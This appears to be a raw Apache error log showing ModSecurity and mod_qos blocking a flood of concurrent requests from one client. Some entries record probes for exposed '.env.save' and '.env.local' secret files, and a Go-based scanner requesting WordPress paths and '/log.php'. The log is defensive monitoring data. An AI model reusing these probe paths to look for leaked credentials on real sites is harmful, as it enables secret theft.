[Tue May 26 20:00:18.280671 2026] [security2:error] [pid 93576:tid 93788] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWueGDRMqfxdEDkosz_gwAAAEw"]
[Tue May 26 20:00:18.286450 2026] [qos:error] [pid 93576:tid 93837] [client 45.148.10.120:57954] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuemDRMqfxdEDkoswAEAAAAH0
[Tue May 26 20:00:18.289016 2026] [qos:error] [pid 106517:tid 106676] [client 45.148.10.120:57862] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWueoZZc2DoU1lPnP1c1gAAAJ8
[Tue May 26 20:00:18.292435 2026] [security2:error] [pid 106517:tid 106744] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWueIZZc2DoU1lPnP1cHgAAAOI"]
[Tue May 26 20:00:18.293121 2026] [security2:error] [pid 93576:tid 93827] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWueGDRMqfxdEDkosz_ggAAAHM"]
[Tue May 26 20:00:18.294322 2026] [security2:error] [pid 93576:tid 93774] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWueGDRMqfxdEDkosz_gAAAAD4"]
[Tue May 26 20:00:18.314253 2026] [security2:error] [pid 106517:tid 106690] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWueIZZc2DoU1lPnP1cIAAAAKw"]
[Tue May 26 20:00:18.318694 2026] [security2:error] [pid 106517:tid 106755] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWueIZZc2DoU1lPnP1cEgAAAO0"]
[Tue May 26 20:00:18.321505 2026] [security2:error] [pid 106517:tid 106656] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWueIZZc2DoU1lPnP1cGAAAAIs"]
[Tue May 26 20:00:18.324988 2026] [security2:error] [pid 93576:tid 93734] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWueGDRMqfxdEDkosz_kAAAABY"]
[Tue May 26 20:00:18.330164 2026] [security2:error] [pid 93576:tid 93839] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWueGDRMqfxdEDkosz_fgAAAH8"]
[Tue May 26 20:00:18.338276 2026] [security2:error] [pid 93576:tid 93752] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWueGDRMqfxdEDkosz_jgAAACg"]
[Tue May 26 20:00:18.340976 2026] [security2:error] [pid 106517:tid 106663] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWueIZZc2DoU1lPnP1cKwAAAJI"]
[Tue May 26 20:00:18.341012 2026] [security2:error] [pid 106517:tid 106643] [remote 45.148.10.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWueoZZc2DoU1lPnP1c0QAAnns"], referer: https://www.ndequipments.com/.env.save
[Tue May 26 20:00:18.359446 2026] [security2:error] [pid 106517:tid 106695] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWueoZZc2DoU1lPnP1ckQAAALE"]
[Tue May 26 20:00:18.366857 2026] [security2:error] [pid 93576:tid 93739] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWueGDRMqfxdEDkosz_kQAAABs"]
[Tue May 26 20:00:18.371571 2026] [security2:error] [pid 93576:tid 93725] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWueGDRMqfxdEDkosz_lQAAAA0"]
[Tue May 26 20:00:18.373258 2026] [security2:error] [pid 106517:tid 106774] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWueIZZc2DoU1lPnP1cIgAAAQA"]
[Tue May 26 20:00:18.373571 2026] [security2:error] [pid 93576:tid 93712] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWueGDRMqfxdEDkosz_jQAAAAA"]
[Tue May 26 20:00:18.380030 2026] [security2:error] [pid 106517:tid 106748] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWueoZZc2DoU1lPnP1cjQAAAOY"]
[Tue May 26 20:00:18.386547 2026] [security2:error] [pid 106517:tid 106720] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWueIZZc2DoU1lPnP1cHwAAAMo"]
[Tue May 26 20:00:18.386961 2026] [security2:error] [pid 106517:tid 106730] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWueoZZc2DoU1lPnP1cngAAANQ"]
[Tue May 26 20:00:18.387996 2026] [security2:error] [pid 106517:tid 106704] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWueoZZc2DoU1lPnP1clwAAALo"]
[Tue May 26 20:00:18.408158 2026] [security2:error] [pid 106517:tid 106684] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWueoZZc2DoU1lPnP1ciQAAAKY"]
[Tue May 26 20:00:18.408725 2026] [security2:error] [pid 93576:tid 93731] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuemDRMqfxdEDkosz_6wAAABM"]
[Tue May 26 20:00:18.417001 2026] [security2:error] [pid 106517:tid 106749] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWueoZZc2DoU1lPnP1cqwAAAOc"]
[Tue May 26 20:00:18.417222 2026] [security2:error] [pid 106517:tid 106701] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWueoZZc2DoU1lPnP1crAAAALc"]
[Tue May 26 20:00:18.423204 2026] [security2:error] [pid 106517:tid 106686] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWueoZZc2DoU1lPnP1cjgAAAKg"]
[Tue May 26 20:00:18.423262 2026] [security2:error] [pid 106517:tid 106766] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWueoZZc2DoU1lPnP1cnwAAAPg"]
[Tue May 26 20:00:18.431134 2026] [security2:error] [pid 106517:tid 106700] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWueoZZc2DoU1lPnP1cmgAAALY"]
[Tue May 26 20:00:18.441018 2026] [security2:error] [pid 106517:tid 106670] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWueoZZc2DoU1lPnP1cnQAAAJk"]
[Tue May 26 20:00:18.441689 2026] [security2:error] [pid 93576:tid 93755] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWueWDRMqfxdEDkosz_zQAAACs"]
[Tue May 26 20:00:18.445266 2026] [security2:error] [pid 106517:tid 106733] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWueoZZc2DoU1lPnP1ckAAAANc"]
[Tue May 26 20:00:18.545677 2026] [security2:error] [pid 93576:tid 93817] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWuemDRMqfxdEDkosz_0QAAAGk"]
[Tue May 26 20:00:18.557636 2026] [qos:error] [pid 93576:tid 93717] [client 45.148.10.120:35216] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuemDRMqfxdEDkoswAQgAAAAU
[Tue May 26 20:00:18.564564 2026] [qos:error] [pid 93576:tid 93780] [client 45.148.10.120:35220] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuemDRMqfxdEDkoswAQwAAAEQ
[Tue May 26 20:00:18.565304 2026] [qos:error] [pid 106517:tid 106770] [client 45.148.10.120:55348] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWueoZZc2DoU1lPnP1dCAAAAPw
[Tue May 26 20:00:18.568003 2026] [qos:error] [pid 106517:tid 106686] [client 45.148.10.120:58044] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWueoZZc2DoU1lPnP1dCgAAAKg
[Tue May 26 20:00:18.573399 2026] [qos:error] [pid 93576:tid 93733] [client 45.148.10.120:35020] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuemDRMqfxdEDkoswARAAAABU
[Tue May 26 20:00:18.576082 2026] [qos:error] [pid 93576:tid 93725] [client 45.148.10.120:57996] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuemDRMqfxdEDkoswARgAAAA0
[Tue May 26 20:00:18.583144 2026] [qos:error] [pid 93576:tid 93785] [client 45.148.10.120:57970] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuemDRMqfxdEDkoswARwAAAEk
[Tue May 26 20:00:18.594685 2026] [qos:error] [pid 106517:tid 106715] [client 45.148.10.120:46646] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWueoZZc2DoU1lPnP1dEAAAAMU
[Tue May 26 20:00:18.596902 2026] [qos:error] [pid 93576:tid 93748] [client 45.148.10.120:35240] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuemDRMqfxdEDkoswASQAAACQ
[Tue May 26 20:00:18.597517 2026] [qos:error] [pid 93576:tid 93748] [client 45.148.10.120:35328] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuemDRMqfxdEDkoswASgAAACQ
[Tue May 26 20:00:18.617696 2026] [security2:error] [pid 106517:tid 106764] [client 45.148.10.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.ndequipments.com"] [uri "/index.php"] [unique_id "ahWueoZZc2DoU1lPnP1dDgAA9mU"]
[Tue May 26 20:00:18.675727 2026] [security2:error] [pid 93576:tid 93792] [client 103.163.220.18:53263] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-includes/css/dist/components/"] [unique_id "ahWuemDRMqfxdEDkoswATgAAAFA"]
[Tue May 26 20:00:18.705750 2026] [qos:error] [pid 93576:tid 93781] [client 45.148.10.120:35216] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuemDRMqfxdEDkoswATwAAAEU
[Tue May 26 20:00:18.713212 2026] [qos:error] [pid 106517:tid 106680] [client 45.148.10.120:55348] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWueoZZc2DoU1lPnP1dFAAAAKI
[Tue May 26 20:00:18.718157 2026] [qos:error] [pid 93576:tid 93787] [client 45.148.10.120:35220] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuemDRMqfxdEDkoswAUQAAAEs
[Tue May 26 20:00:18.719029 2026] [qos:error] [pid 106517:tid 106735] [client 45.148.10.120:58044] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWueoZZc2DoU1lPnP1dFgAAANk
[Tue May 26 20:00:18.723436 2026] [qos:error] [pid 93576:tid 93771] [client 45.148.10.120:35020] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuemDRMqfxdEDkoswAUgAAADs
[Tue May 26 20:00:18.727633 2026] [qos:error] [pid 93576:tid 93741] [client 45.148.10.120:57996] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuemDRMqfxdEDkoswAUwAAAB0
[Tue May 26 20:00:18.732492 2026] [qos:error] [pid 93576:tid 93814] [client 45.148.10.120:57970] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuemDRMqfxdEDkoswAVAAAAGY
[Tue May 26 20:00:18.745158 2026] [qos:error] [pid 93576:tid 93731] [client 45.148.10.120:35328] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuemDRMqfxdEDkoswAVQAAABM
[Tue May 26 20:00:18.746211 2026] [qos:error] [pid 106517:tid 106675] [client 45.148.10.120:46646] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWueoZZc2DoU1lPnP1dFwAAAJ4
[Tue May 26 20:00:18.750444 2026] [qos:error] [pid 93576:tid 93713] [client 45.148.10.120:35240] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuemDRMqfxdEDkoswAVgAAAAE
[Tue May 26 20:00:18.854176 2026] [qos:error] [pid 93576:tid 93783] [client 45.148.10.120:35216] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuemDRMqfxdEDkoswAWgAAAEc
[Tue May 26 20:00:18.862437 2026] [qos:error] [pid 106517:tid 106688] [client 45.148.10.120:55348] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWueoZZc2DoU1lPnP1dGwAAAKo
[Tue May 26 20:00:18.870752 2026] [qos:error] [pid 106517:tid 106679] [client 45.148.10.120:58044] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWueoZZc2DoU1lPnP1dHAAAAKE
[Tue May 26 20:00:18.872399 2026] [qos:error] [pid 93576:tid 93719] [client 45.148.10.120:35220] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuemDRMqfxdEDkoswAXAAAAAc
[Tue May 26 20:00:18.873375 2026] [qos:error] [pid 93576:tid 93822] [client 45.148.10.120:35020] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuemDRMqfxdEDkoswAXQAAAG4
[Tue May 26 20:00:18.879840 2026] [qos:error] [pid 93576:tid 93797] [client 45.148.10.120:57970] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuemDRMqfxdEDkoswAXwAAAFU
[Tue May 26 20:00:18.880014 2026] [qos:error] [pid 93576:tid 93834] [client 45.148.10.120:57996] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuemDRMqfxdEDkoswAXgAAAHo
[Tue May 26 20:00:18.893997 2026] [qos:error] [pid 93576:tid 93779] [client 45.148.10.120:35328] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuemDRMqfxdEDkoswAYQAAAEM
[Tue May 26 20:00:18.898066 2026] [qos:error] [pid 106517:tid 106733] [client 45.148.10.120:46646] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWueoZZc2DoU1lPnP1dHgAAANc
[Tue May 26 20:00:19.006108 2026] [qos:error] [pid 93576:tid 93743] [client 45.148.10.120:35216] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWue2DRMqfxdEDkoswAZAAAAB8
[Tue May 26 20:00:19.012431 2026] [qos:error] [pid 106517:tid 106706] [client 45.148.10.120:55348] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWue4ZZc2DoU1lPnP1dIAAAALw
[Tue May 26 20:00:19.021744 2026] [qos:error] [pid 106517:tid 106727] [client 45.148.10.120:58044] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWue4ZZc2DoU1lPnP1dIQAAANE
[Tue May 26 20:00:19.022978 2026] [qos:error] [pid 93576:tid 93835] [client 45.148.10.120:35020] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWue2DRMqfxdEDkoswAZwAAAHs
[Tue May 26 20:00:19.026506 2026] [qos:error] [pid 93576:tid 93733] [client 45.148.10.120:35220] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWue2DRMqfxdEDkoswAaAAAABU
[Tue May 26 20:00:19.027351 2026] [qos:error] [pid 93576:tid 93733] [client 45.148.10.120:57970] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWue2DRMqfxdEDkoswAaQAAABU
[Tue May 26 20:00:19.031514 2026] [qos:error] [pid 93576:tid 93785] [client 45.148.10.120:57996] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWue2DRMqfxdEDkoswAagAAAEk
[Tue May 26 20:00:19.041342 2026] [qos:error] [pid 93576:tid 93736] [client 45.148.10.120:35328] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWue2DRMqfxdEDkoswAawAAABg
[Tue May 26 20:00:19.048308 2026] [qos:error] [pid 106517:tid 106681] [client 45.148.10.120:46646] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWue4ZZc2DoU1lPnP1dIwAAAKM
[Tue May 26 20:00:19.137275 2026] [security2:error] [pid 93576:tid 93735] [client 45.148.10.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ndequipments.com"] [uri "/index.php"] [unique_id "ahWue2DRMqfxdEDkoswAbAAAF1M"], referer: https://www.ndequipments.com/.env.local
[Tue May 26 20:00:19.154985 2026] [qos:error] [pid 93576:tid 93814] [client 45.148.10.120:35216] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWue2DRMqfxdEDkoswAbgAAAGY
[Tue May 26 20:00:19.162871 2026] [qos:error] [pid 106517:tid 106692] [client 45.148.10.120:55348] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWue4ZZc2DoU1lPnP1dJgAAAK4
[Tue May 26 20:00:19.171913 2026] [qos:error] [pid 106517:tid 106677] [client 45.148.10.120:58044] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWue4ZZc2DoU1lPnP1dJwAAAKA
[Tue May 26 20:00:19.172130 2026] [qos:error] [pid 93576:tid 93713] [client 45.148.10.120:35020] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWue2DRMqfxdEDkoswAbwAAAAE
[Tue May 26 20:00:19.176057 2026] [security2:error] [pid 106517:tid 106770] [client 103.163.220.21:47663] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/log.php"] [unique_id "ahWue4ZZc2DoU1lPnP1dKAAAAPw"]
[Tue May 26 20:00:19.176722 2026] [qos:error] [pid 93576:tid 93761] [client 45.148.10.120:57970] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWue2DRMqfxdEDkoswAcAAAADE
[Tue May 26 20:00:19.180940 2026] [qos:error] [pid 93576:tid 93793] [client 45.148.10.120:35220] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWue2DRMqfxdEDkoswAcQAAAFE
[Tue May 26 20:00:19.182819 2026] [qos:error] [pid 93576:tid 93816] [client 45.148.10.120:57996] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWue2DRMqfxdEDkoswAcgAAAGg
[Tue May 26 20:00:19.188726 2026] [qos:error] [pid 93576:tid 93765] [client 45.148.10.120:35328] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWue2DRMqfxdEDkoswAdAAAADU
[Tue May 26 20:00:19.198869 2026] [qos:error] [pid 106517:tid 106686] [client 45.148.10.120:46646] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWue4ZZc2DoU1lPnP1dKQAAAKg
[Tue May 26 20:00:19.211335 2026] [qos:error] [pid 93576:tid 93781] [client 45.148.10.120:46668] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWue2DRMqfxdEDkoswAdgAAAEU
[Tue May 26 20:00:19.284944 2026] [security2:error] [pid 106517:tid 106736] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWueoZZc2DoU1lPnP1cqAAAANo"]
[Tue May 26 20:00:19.288581 2026] [security2:error] [pid 106517:tid 106747] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWueoZZc2DoU1lPnP1ctgAAAOU"]
[Tue May 26 20:00:19.289795 2026] [security2:error] [pid 106517:tid 106665] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWueoZZc2DoU1lPnP1cqgAAAJQ"]
[Tue May 26 20:00:19.319240 2026] [security2:error] [pid 106517:tid 106722] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWueoZZc2DoU1lPnP1cxQAAAMw"]
